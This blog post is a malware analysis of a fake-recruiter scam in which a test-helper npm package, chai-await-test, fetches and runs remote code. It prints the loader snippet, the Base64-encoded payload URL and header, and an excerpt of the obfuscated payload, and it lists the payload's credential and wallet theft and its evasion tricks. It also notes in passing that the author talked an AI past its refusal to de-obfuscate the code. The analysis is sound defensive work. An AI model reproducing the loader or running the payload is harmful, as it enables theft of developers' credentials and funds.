Following The Malicious Dependency Trail


Dec 29, 2025



Dev


Following The Malicious Dependency Trail:  From A Fake Recruiter To The Supply-Chain Attack

Modern attacks don't always kick down the front door – sometimes, they come dressed as opportunity.

The Social Engineering Red Flag

This investigation began the way so many digital “whodunnits” do: with a message that promised more than it should. My friend was contacted by someone claiming to be a recruiter from a well-known company, complete with a legitimate-looking LinkedIn profile to prove it. I happened to be driving at the time, so I couldn’t vet the recruiter myself. Instead, I told my friend to ask in the company’s official Discord community whether they recognized the name.

As he described the process to me (“just clone this repo, run the tests, and report back”), my skepticism grew. The procedure didn’t match the meticulous recruiting workflow I’d seen from this company before, where everything was formal and carefully tracked, and certainly never involved off-the-books GitHub repositories delivered by direct message.

Unfortunately, by the time the Discord reply came in ("No, that's not a real recruiter, avoid!"), he’d already run the tests on his machine. When I finally got to a computer, the first thing I did was ask him to push his clone of the project to my GitHub account. I needed to forensically examine exactly what he’d just executed, and whether the damage could still be contained.

Initial Review and Safe Handling

With suspicion in the air, we settled on a best-practice approach: never run untrusted code locally. I spun up a fresh Google Cloud Platform VM and cloned the suspicious repo. Even with the repo open before me, nothing immediately stood out. The code seemed standard, the repo’s structure quite normal. It claimed to be a smart-contract tech interview, but it would turn out to be a little more than that.

The content was mostly Solidity and JavaScript files, mirroring the sort of technology stack common in web3/crypto spaces, a detail that, in hindsight, would become significant.

Tip: Always run untrusted code in a disposable, isolated environment. Cloud VMs are cheap insurance against getting burned, and they have the advantage of not standing out as much as dedicated analysis sandboxes when the malware has basic VM detection.

Probing with Process Monitoring and Dependency Forensics

Knowing that surface-level code can easily hide deeper threats, I started gathering process information. Here’s what the system looked like before running any install or test commands:

PID TTY          TIME CMD
1   ?        00:00:01 systemd
2   ?        00:00:00 kthreadd
...
1000 pts/0    00:00:00 bash

After running npm install, I checked for obvious threats: no git hooks, no suspicious processes beyond the usual system daemons. So far, everything seemed normal.

But sleuthing through the dependency tree, I noticed axios, which has absolutely nothing to do with web3 development. A closer look with npm ls axios showed it came in via an odd, test-only package:

chai-await-test
└── axios

Why would a test helper depend on an HTTP library? That question became my biggest lead. I figured it was about time to see it in action, so I ran npx hardhat test.

Once the tests ran, new processes sprang into existence, namely:

otniel_+  990088 node /home/***/project/smart-contract-tech-interview/node_modules/chai-await-test/lib/caller.js ...
otniel_+  990100 node -e const axios = require("axios"); const os = require("os"); ... // Malicious runtime code

The first was essentially an invocation from the malicious dependency; the second was doing far more interesting things.

The Malicious Test Helper: Dynamic Payloads

Tracing chai-await-test led straight to the smoking gun: the code that actually spawned child processes and executed code dynamically. The package’s index.js spawned a background process (PID 990088 above), while lib/caller.js executed arbitrary code downloaded from a remote URL via this mechanism:

// Decode the C2 URL and a secret header name/value from Base64 env vars
const src = atob(process.env.DEV_API_KEY);
const k = atob(process.env.DEV_SECRET_KEY);
const v = atob(process.env.DEV_SECRET_VALUE);

// Fetch the payload ("cookie" field), compile it, and hand it `require`
const s = (await axios.get(src, { headers: { [k]: v } })).data.cookie;
const handler = new Function.constructor("require", s);
handler(require);

The first clue? Those “API key”-looking environment variables. Here’s what was actually inside:

  • DEV_API_KEY: "aHR0cHM6Ly9qc29ua2VlcGVyLmNvbS9iL0pQREI0" → decodes to https://jsonkeeper.com/b/JPDB4 (a benign-looking pastebin)

  • DEV_SECRET_KEY: "eC1zZWNyZXQta2V5" → decodes to x-secret-key

  • DEV_SECRET_VALUE: "Xw==" → decodes to _

Essentially, the helper package was a remote code loader. Whatever “test” you ran would, via a simple Base64 decode, fetch and execute a live payload from the internet.
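You can verify these decodings yourself in Node; Buffer.from is the usual stand-in for the browser's atob:

```javascript
// Verify the Base64 decodings of the fake "API key" env vars.
const decode = (b64) => Buffer.from(b64, 'base64').toString('utf8');

const src = decode('aHR0cHM6Ly9qc29ua2VlcGVyLmNvbS9iL0pQREI0'); // payload URL
const key = decode('eC1zZWNyZXQta2V5');                         // header name
const val = decode('Xw==');                                     // header value
// src → "https://jsonkeeper.com/b/JPDB4", key → "x-secret-key", val → "_"
```

Nothing here is cryptography; Base64 is pure obfuscation, just enough to keep the URL and header out of casual grep results.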

Before diving deeper into the details of the code, we had to get the package taken down, so we reported it to npmjs.com, and it was removed.

De-obfuscation, Evasion, and Implications

It was time to fetch the actual payload (the “cookie” property from that jsonkeeper page) for analysis. What I got was a wall of nightmarishly obfuscated JavaScript:

{
        "cookie": "(function(_0x391117,_0x5661d2){function _0xdffafc(_0x204a7d,_0x44d035,_0x259abc,_0x2cfdf9){return _0x2da5(_0x2cfdf9-0x3bd,_0x204a7d);}const _0x1861f5=_0x391117();function _0x24c1d8(_0x288800,_0x15a41a,_0x24e586,_0x458668){return _0x2da5(_0x24e586- -0x297,_0x288800);}while(!![]){try{const _0x34b29a=parseInt(_0xdffafc(0x616,0x59c,0x5c3,0x5fd))/(-0x1059+-0x22dc*0x1+0x3336)+-parseInt(_0xdffafc(0x656,0x5db,0x656,0x5e0))/(-0x1*0x741+-0x22d9+0x2a1c)*(-parseInt(_0x24c1d8(-0x132,-0x99,-0x81,-0x5))/(-0x1615+0x15*0x197+-0xb4b))+-parseInt(_0x24c1d8(-0x120,-0xb7,-0xdc,-0xd8))/(0x140*-0xb+-0x2705+0x34c9)+-parseInt(_0xdffafc(0x57c,0x684,0x534,0x5f3))/(0x1877+-0x3*-0xa66+-0x4a3*0xc)*(-parseInt(_0xdffafc(0x441,0x498,0x478,0x504))/(-0xff6+0x2191+-0x1*0x1195))+parseInt(_0xdffafc(0x6f7,0x6c1,0x6f7,0x667))/(0x2067+-0x1*-0x1bbf+-0x3c1f)+parseInt(_0xdffafc(0x591,0x671,0x63e,0x652))/(-0x144d+-0x5*-0x6c0+-0xe5*0xf)*(parseInt(_0x24c1d8(0x36,0xc8,0x29,0x95))/(0xe9*-0x1+-0xf0*-0x17+0x1d*-0xb6))+parseInt(_0x24c1d8(0x2b,0x3f,-0x52,-0x93))/(-0x1802+0x1ba5+-0x399)*(-parseInt(_0x24c1d8(-0x17a,-0x3d,-0xbe,-0x14e))/(-0x3f*-0x22+-0x7*0x8a+-0x48d));if(_0x34b29a===_0x5661d2)break;else _0x1861f5['push'](_0x1861f5['shift']());}catch(_0x21d70f){_0x1861f5['push'](_0x1861f5['shift']());}}}.... etc

I tried de-obfuscating with some online tools, but without much success (admittedly, this could have been a skill issue 😅). Then I did what every programmer in 2025 would: I turned to AI. It figured out pretty quickly that this was malware and refused to show me plain code, so I had to reason with it to get it to actually do something. Initially I just had the formatted cookie code, and I tried to get a general idea of what it was doing and added comments to it. After a couple of hours of AI-aided de-obfuscation, the horrifying reality settled in:

  • The payload aggressively checked whether it was running in a VM or sandbox, refusing to deploy if anything looked “suspicious” (detected via environment variables, MAC addresses, CPU count, timing attacks, and more).

  • It exfiltrated vast troves of data:

    • Over 50 wallet browser extension directories (MetaMask, Phantom, Binance Wallet, etc.)

    • Desktop wallet files (Exodus, Electrum, Atomic, more)

    • Browser saved passwords, cookies, and autofill

    • Discord tokens

    • Detailed system, hardware, and software info

  • Not least, it had the ability to download and execute additional malware.

All transfers were stealthy, using rotating user agents, error-silencing, Discord webhook endpoints, and “live” file uploads.

On a developer machine with keys and extensions, this would have meant catastrophic theft, not just of crypto but possibly of all digital identity.

On the defensive side, the payload used every trick in the evasion book:

  • Obfuscation & Encoding: Every string, every function, every constant scrambled or Base64-encoded.

  • Anti-debugging: Intentionally slow, catastrophic regex patterns to stall runtime analysis.

  • Anti-VM/Analysis: Refused to run in popular sandboxes, checked for debuggers and forensics tools.

  • Dead code, control-flow flattening, and runtime disguise to frustrate code reviewers and static analysis.

Eventually I put together a partially de-obfuscated file with the most important findings that came out of the AI investigation.

Conclusions and Takeaways

My friend didn’t get a job offer, but he learned a lesson, and I hope the rest of us do too.

This “investigation” reaffirms a brutal reality of modern software: the greatest risk isn’t always what you see, but what sits in the background, a single test or install command away from complete compromise.

As with event-stream, ua-parser-js and other supply-chain attacks, the threat hid not in application logic, but in the shifting shadow of indirect dependencies. These are not just things of the past. The entire npm package ecosystem is a vulnerability and it’s not getting any better. Just recently, GitLab found a very widespread supply chain attack of a slightly different flavor.

Key lessons for all developers and candidates:

  • Be hyper-vigilant about any hiring workflow that strays from official channels.

  • Never run code or tests from untrusted sources on a personal or work machine. Use isolated cloud VMs.

  • Don’t trust that “test helpers” or dev dependencies are harmless.

  • Audit your dependency trees (use npm ls <package>, investigate indirect deps).

  • If you spot unfamiliar dependencies pulling in HTTP libraries for tests, dig deeper.

  • Assume anything obfuscated, indirect, or “live-fetched” is a likely threat until proven otherwise.

  • If you’re developing a project and getting help from other people, be very careful about dependencies introduced by contributors.

Stay curious, stay skeptical, and verify everything. Even a little professional paranoia can go a long way. It’s kind of ironic how the people working on blockchain, where “don’t trust, verify” is almost like a mantra, seem to be the most frequent targets for this kind of attack.

👉 If you suspect your machine may have run code like this: rotate all your authentication tokens, authentication keys and wallet seeds, restore from backup, and treat the incident as a full compromise. If this was a work machine, inform your employer and make sure all access is revoked from possibly compromised accounts.


Author: Otniel Nicola
Senior Software Engineer @ AxLabs

© Made with

♥️

in 🇨🇭 Switzerland
